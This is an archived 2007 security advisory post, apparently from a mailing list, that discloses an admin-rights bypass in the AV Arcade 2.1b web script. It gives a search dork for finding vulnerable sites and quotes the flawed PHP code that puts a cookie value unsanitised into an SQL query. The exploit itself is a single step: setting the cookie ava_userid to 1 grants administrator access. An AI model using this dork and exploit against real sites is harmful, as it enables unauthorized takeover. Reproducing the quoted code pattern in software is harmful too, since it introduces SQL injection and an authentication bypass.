AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - http://RSTZONE.nET

Vurnerable code: admin/index.php:

   $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid']."");    while($row = mysql_fetch_array($sql)){    if ($row['admin'] == 1) {
   define( 'ADMIN_ACCESS', 1 );
   [...]

Exploit:

Set in your cookies: ava_userid = 1; and that`s all :p

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]
[EOF] Received on Mon Jul 2 14:22:27 2007

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek